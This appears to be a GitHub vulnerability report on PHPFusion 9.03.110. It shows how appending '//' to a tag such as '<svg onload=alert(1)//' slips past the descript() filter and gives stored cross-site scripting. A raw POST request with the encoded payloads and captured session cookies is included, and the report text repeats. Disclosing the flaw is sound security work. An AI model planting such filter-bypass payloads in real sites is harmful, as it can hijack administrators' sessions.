#KietNA From Inv1cta Team, HPT Cyber Security Center
Sorry for bad english Describe the bug
preg patterns filter html tag without "//" in descript() function, the authenticated user can trigger xss by append "//" in the end of text Version
PHPFusion version: PHPFusion 9.03.110
To Reproduce
Steps to reproduce the behavior:
Go to any textarea form
Add "<svg onload=alert(1)//" in textarea form and submit
When authenticated user or admin use preview html function the malicious script will be executed, even the attacker can store malicious script when admin publish submission
Screenshots
preg pattern filter html tag without "//" in the end of html
User preview and submit submission
Admin preview submission of user
Admin publish submission and the attacker can store malicious script
The Attacker can store malicious script in forum without admin browsing the post by post new thread function
When admin click on Activity button, the script of user kietna will be executed
Additional context
###REQUEST:
POST /submit.php?stype=a HTTP/1.1
Host: 172.16.0.12:5554
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 395
Origin: http://172.16.0.12:5554
Connection: close
Referer: http://172.16.0.12:5554/submit.php?stype=a
Cookie: PHPSESSID=qhclrgdoah7rbv9l34fvj07h00; fusiony1dli_session=jjfp12qmql4s64caf8ob6eld2t; fusiony1dli_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0; fusiony1dli_user=1.1630015266.b9cf1c8d19231964f87b60503eb37b6cd23047438f61fe3b750f0d371a242ec6; fusiony1dli_admin=1.1630015307.2c32968c83f8c4c0224d5a0d4a0de496d62b98325c2754a38c3451087161671e; fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; fusionc4q8w_visited=yes; fusionc4q8w_lastvisit=1629852584; fusionc4q8w_user=2.1630031855.2d2e26d63d89a73447202a9978b3ff81a084dae1acbddeeb4c6fd5de86f85469
Upgrade-Insecure-Requests: 1
fusion_token=2-1629861818-8b90d545094236c6cc3daa34012b16531afc70a7d12df00e8dba976f92f37e84&form_id=submissionform&fusion_wKs75X=&article_subject=%22%3E%3Csvg+onload%3Dalert%281%29%3B%2F%2F&article_keywords=&article_cat=1&article_language%5B%5D=English&article_snippet=%22%3E%3Csvg+onload%3Dalert%281%29%3B%2F%2F&article_article=%22%3E%3Csvg+onload%3Dalert%281%29%3B%2F%2F&preview_article=Preview
###RESPONSE:
HTTP/1.1 200 OK
Date: Wed, 25 Aug 2021 03:25:24 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
X-Powered-By: PHPFusion 9.03.110
Last-Modified: Wed, 25 Aug 2021 03:25:25 GMT
Cache-Control: no-cache
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68868
The text was updated successfully, but these errors were encountered:
KietNA-HPT
changed the title
Cross-site Scripting bypass in descript() function
Bypass preg pattern lead to Cross-site Scripting in descript() function
Aug 25, 2021
#KietNA From Inv1cta Team, HPT Cyber Security Center
Sorry for bad english
Describe the bug
preg patterns filter html tag without "//" in descript() function, the authenticated user can trigger xss by append "//" in the end of text
Version
PHPFusion version: PHPFusion 9.03.110
To Reproduce
Steps to reproduce the behavior:
Screenshots
preg pattern filter html tag without "//" in the end of html

User preview and submit submission

Admin preview submission of user

Admin publish submission and the attacker can store malicious script

The Attacker can store malicious script in forum without admin browsing the post by post new thread function


When admin click on Activity button, the script of user kietna will be executed
Additional context
###REQUEST:
###RESPONSE:
The text was updated successfully, but these errors were encountered: